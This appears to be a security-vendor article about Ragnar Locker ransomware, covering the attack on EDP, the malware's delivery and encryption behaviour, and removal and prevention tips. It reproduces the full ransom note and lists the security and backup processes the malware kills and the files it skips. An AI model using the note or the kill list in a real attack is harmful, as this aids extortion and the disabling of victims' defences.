Ransomware is a very nasty malware because the attackers demand the victim to pay up for his or her important data to be released from being hostage. The ransomware stealthily infects the victim’s device, encrypts the important data (including the backup files), then leaves instructions on how much ransom should be paid and how it should be paid. After all of these hassles, the victim has no guarantee that the attacker will actually release the decryption key to unlock the files. And if they ever do, some of the files might be corrupted, rendering them useless in the end.
Over the years, the use of ransomware has grown in popularity because it is the most direct way for hackers to earn money. They just need to drop the malware, then wait for the user to send money through Bitcoin. According to data from Emsisoft, the number of ransomware attacks in 2019 increased by 41% over the previous year, affecting around 1,000 U.S.organizations. Cybersecurity Ventures even predicted that ransomware will attack businesses every 11 seconds.
Earlier this year, Ragnar Locker, a new strain of malware, attacked Energias de Portugal (EDP), a Portuguese electric utility company, headquartered in Lisbon. The attackers demanded 1,580 bitcoins as ransom, which is equivalent to around $11 million.
What is Ragnar Locker Ransomware?
Ragnar Locker is ransomware type of malware created not just to encrypt data, but also to kill installed applications, such as ConnectWise and Kaseya, that are usually used by managed service providers and several Windows services. Ragnar Locker renames the encrypted files by appending a unique extension composed of the word ragnar followed by a string of random numbers and characters. For example, a file with the name A.jpg will be renamed to A.jpg.ragnar_0DE48AAB.
After encrypting the files, it then creates a ransom message using a text file, with the same name format as with the example above. The ransom message could be named RGNR_0DE48AAB.txt.
This ransomware only runs on Windows computers, but it is not yet sure if the authors of this malware have also designed a Mac version of Ragnar Locker. It usually targets processes and applications commonly used by managed service providers to keep their attack from being detected and stopped. Ragnar Locker is only aimed at English-speaking users.
Ragnar Locker ransomware was first detected around the end of December 2019, when it was used as part of attacks against compromised networks. According to security experts, the Ragnar Locker attack on the European energy giant was a well-thought-of and thoroughly planned attack.
Here is an example of the Ragnar Locker ransom message:
Hello * !
********************
If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED
by RAGNAR_LOCKER !
********************
*********What happens with your system ?************
Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US.
You can google it, there is no CHANCES to decrypt data without our SECRET KEY.
But don’t worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY.
We are looking only for MONEY, so there is no interest for us to steel or delete your information, it’s just a BUSINESS $-)
HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!!
Also, all of your sensitive and private information were gathered and if you decide NOT to pay,
we will upload it for public view !
****
***********How to get back your files ?******
To decrypt all your files and data you have to pay for the encryption KEY :
BTC wallet for payment: *
Amount to pay (in Bitcoin): 25
****
***********How much time you have to pay?**********
* You should get in contact with us within 2 days after you noticed the encryption to get a better price.
* The price would be increased by 100% (double price) after 14 Days if there is no contact made.
* The key would be completely erased in 21 day if there is no contact made or no deal made.
Some sensetive information stolen from the file servers would be uploaded in public or to re-seller.
****
***********What if files can’t be restored ?******
To prove that we really can decrypt your data, we will decrypt one of your locked files !
Just send it to us and you will get it back FOR FREE.
The price for the decryptor is based on the network size, number of employees, annual revenue.
Please feel free to contact us for amount of BTC that should be paid.
****
! IF you don’t know how to get bitcoins, we will give you advise how to exchange the money.
!!!!!!!!!!!!!
! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US !
!!!!!!!!!!!!!
1) Go to the official website of TOX messenger ( hxxps://tox.chat/download.html )
2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. )
3) Open messenger, click “New Profile” and create profile.
4) Click “Add friends” button and search our contact *
5) For identification, send to our support data from —RAGNAR SECRET—
IMPORTANT ! IF for some reasons you CAN’T CONTACT us in qTOX, here is our reserve mailbox ( * ) send a message with a data from —RAGNAR SECRET—
WARNING!
-Do not try to decrypt files with any third-party software (it will be damaged permanently)
-Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER!
-Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME !
********************
—RAGNAR SECRET—
*
—RAGNAR SECRET—
********************
What Does the Ragnar Locker Do?
Ragnar Locker is usually delivered via MSP tools such as ConnectWise, wherein the cybercriminals drop a highly targeted ransomware executable file. This propagation technique has been used by previous highly malicious ransomware, such as Sodinokibi. When this type of attack happens, the authors of the ransomware infiltrate organizations or facilities via unsecured or badly secured RDP connections. It then uses tools to send Powershell scripts to all accessible endpoints. The scripts then download a payload via Pastebin designed to execute the ransomware and encrypt the endpoints. In some instances, the payload comes in the form of an executable file that is launched as part of a file-based attack. There are also cases when additional scripts are downloaded as part of a completely file-less attack.
Ragnar Locker specifically targets software commonly run by managed service providers, including the following strings:
- vss
- sql
- memtas
- mepocs
- sophos
- veeam
- backup
- pulseway
- logme
- logmein
- connectwise
- splashtop
- kaseya
The ransomware first steals a target’s files and upload it to their servers. What’s unique about Ragnar Locker is that they don’t simply encrypt the files but also threaten the victim that the data will be released publicly if the ransom has not been paid, such as the case with EDP. With EDP, the attackers threatened to release the supposed 10TB of stolen data, which could one of the biggest data leaks in history. The attackers claimed that all partners, clients, and competitors will be informed of the breach and their leaked data will be sent to news and media sources for public consumption. Although EDP’s spokesperson has announced that the attack did not have an impact on the utility’s power service and infrastructure, the looming data breach is something that they are worried about.
Disabling services and terminating processes are common tactics used by malware to disable security programs, backup systems, databases, and mail servers. Once these programs have been terminated, their data can then be encrypted.
When first launched, Ragnar Locker will scan the configured Windows language preferences. If the language preference is English, the malware will continue with the next step. But if Ragnar Locker detected that the language is set as one of the former USSR countries, the malware will terminate the process and will not with encrypting the computer.
Ragnar Locker compromises the MSP’s security tools before they can block the ransomware from being executed. Once inside, the malware initiates the encryption process. It uses an embedded RSA-2048 key to encrypt the important files.
Ragnar Locker does not encrypt all the files. It will skip some folders, filenames, and extensions, such as:
- kernel32.dll
- Windows
- Windows.old
- Tor browser
- Internet Explorer
- Opera
- Opera Software
- Mozilla
- Mozilla Firefox
- $Recycle.Bin
- ProgramData
- All Users
- autorun.inf
- boot.ini
- bootfont.bin
- bootsect.bak
- bootmgr
- bootmgr.efi
- bootmgfw.efi
- desktop.ini
- iconcache.db
- ntldr
- ntuser.dat
- ntuser.dat.log
- ntuser.ini
- thumbs.db
- .sys
- .dll
- .lnk
- .msi
- .drv
- .exe
Aside from appending a new file extension to the encrypted files, Ragnar Locker also adds a ‘RAGNAR’ file marker to the end of every encrypted file.
Ragnar Locker then drops a ransom message named ‘.RGNR_[extension].txt’ containing details on the ransom amount, the bitcoin payment address, a TOX chat ID to be used to communicate with the attackers, and a backup email address if there are problems with TOX. Unlike other ransomware, Ragnar Locker does not have a fixed amount of ransom. It varies according to the target and it is calculated individually. In some reports, the amount of the ransom could vary between $200,000 to $600,000. In the case of EDP, the ransom asked was 1,580 bitcoin or $11 million.
How to Remove Ragnar Locker
If your computer was unlucky to be infected with Ragnar Locker, the first thing you need to do is to check if all of your files have been encrypted. You also need to check whether your backup files have been encrypted as well. Attacks like this highlight the importance of having a backup of your important data because at least, you won’t have to worry about losing access to your files.
Do not attempt to pay the ransom because it will be useless. There is no guarantee that the attacker will send you the correct decryption key and that your files will never be leaked to the public. In fact, it is highly possible that the attackers will continue to extort money from you because they know that you are willing to pay.
What you can do is delete the ransomware first from your computer before trying to decrypt it. You can use your antivirus or anti-malware app to scan your computer for malware and follow the instructions to delete all detected threats. Next, uninstall any suspicious apps or extensions that might be related to the malware.
Finally, look for a decryption tool that matches the Ragnar Locker. There are several decryptors that have been designed for files encrypted by ransomware, but you should check your security software manufacturer first if they have one available. For example, Avast and Kaspersky have their own decryption tool that users can use. Here is a list of other decryption tools you can try.
How to Protect Yourself from the Ragnar Locker
Ransomware can be quite troublesome, especially if there is no existing decryption tool capable of undoing the encryption done by the malware. To protect your device from ransomware, particularly Ragnar Locker, here are some of the tips you need to keep in mind:
- Employ a strong password policy, using a double-factor or multi-factor authentication (MFA) if possible. If it is not possible, generate random, unique passwords that will be difficult to guess.
- Make sure to lock your computer when leaving your desk. Whether you’re going out for lunch, taking a short break, or just going to the restroom, lock your computer to prevent unauthorized access.
- Create a data backup and recovery plan, especially for critical information on your computer. Store the most critical information stored outside the network or on an external device if possible. Test these backups regularly to make sure that they function correctly in the event of a real crisis.
- Make your systems are updated and installed with the latest security patches. Ransomware usually exploits vulnerabilities in your system, so make sure that your device’s security is air-tight.
- Be wary of the common vectors for phishing, which is the most common distribution method of ransomware. Don’t click random links and always scan email attachments before downloading them to your computer.
- Have a robust security software installed on your device and keep the database updated with the latest threats.